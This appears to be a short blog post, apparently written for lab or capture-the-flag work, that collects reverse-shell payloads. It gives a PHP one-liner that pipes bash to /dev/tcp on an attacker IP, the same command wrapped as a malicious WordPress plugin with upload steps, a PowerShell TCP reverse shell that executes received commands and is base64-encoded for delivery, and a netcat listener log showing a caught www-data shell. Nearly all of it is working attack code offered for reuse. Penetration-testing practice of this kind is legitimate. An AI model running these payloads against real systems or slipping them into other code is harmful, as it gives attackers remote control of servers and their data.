Post

Reverse shells

(a work in progress list of some handy reverse shells)

ℹ️ Some nifty links

Opening

PHP

A generic PHP reverse shell where you can/should swap out the listening IP address and port:

1
2
3
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.45.224/8080 0>&1'");
?>

WordPress

For a WordPress plugin, you need to add a bit more info for it to load as a “valid” plugin as outlined in the plugin development docs .

1
2
3
4
5
6
7
8
9
10
11
<?php
/**
* Plugin Name: reverse shell plugin
* Description: opens a reverse shell with bash
* Version: 0.1
* Author: some-natalie
* Author URI: https://some-natalie.dev
*/

exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.45.224/8080 0>&1'");
?>

Zip that PHP file, then upload the zipped file as a plugin.

This lovely malicious WordPress plugin generator works well on some versions of WordPress and not others. The boring one above works a bit more uniformally, but is nowhere near as full of features.

Powershell

1
2
3
4
5
6
7
$Text = '$client = New-Object System.Net.Sockets.TCPClient("192.168.45.236",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'

$Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)

$EncodedText = [Convert]::ToBase64String($Bytes)

$EncodedText

Catching

netcat

1
2
3
4
5
6
ᐅ nc -l 8080
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
www-data@8b8f280a8848:/var/www/html/wp-admin$ cat /tmp/flag
cat /tmp/flag
flag{a sneaky flag has appeared}
This post is licensed under CC BY 4.0 by the author.